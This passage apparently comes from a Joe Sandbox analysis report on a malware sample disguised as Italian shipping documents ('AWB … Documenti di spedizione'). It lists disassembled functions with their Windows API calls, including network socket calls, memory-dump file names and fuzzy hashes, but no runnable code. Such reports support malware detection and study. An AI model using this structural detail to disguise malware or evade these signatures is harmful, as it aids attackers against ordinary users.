                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                        Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                        • String ID: cdecl
                        • API String ID: 3850814276-3896280584
                        • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                        • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                        Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                        • _memmove.LIBCMT ref: 0046D475
                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 2502553879-0
                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                        Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32 ref: 00448C69
                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                        Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLastacceptselect
                        • String ID:
                        • API String ID: 385091864-0
                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                        Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                        Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                        • GetStockObject.GDI32(00000011), ref: 00430258
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$CreateMessageObjectSendShowStock
                        • String ID:
                        • API String ID: 1358664141-0
                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                        Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                        Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                        Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • __wsplitpath.LIBCMT ref: 0043392E
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • __wsplitpath.LIBCMT ref: 00433950
                        • __wcsicoll.LIBCMT ref: 00433974
                        • __wcsicoll.LIBCMT ref: 0043398A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                        • String ID:
                        • API String ID: 1187119602-0
                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                        Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                        • String ID:
                        • API String ID: 1597257046-0
                        • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                        • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                        Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                        • __malloc_crt.LIBCMT ref: 0041F5B6
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$Free__malloc_crt
                        • String ID:
                        • API String ID: 237123855-0
                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                        Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DeleteDestroyObject$IconWindow
                        • String ID:
                        • API String ID: 3349847261-0
                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                        Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                        Download Yara Rule
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                        • String ID:
                        • API String ID: 2223660684-0
                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                        Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                        • LineTo.GDI32(?,?,?), ref: 00447326
                        • EndPath.GDI32(?), ref: 00447336
                        • StrokePath.GDI32(?), ref: 00447344
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                        • String ID:
                        • API String ID: 2783949968-0
                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
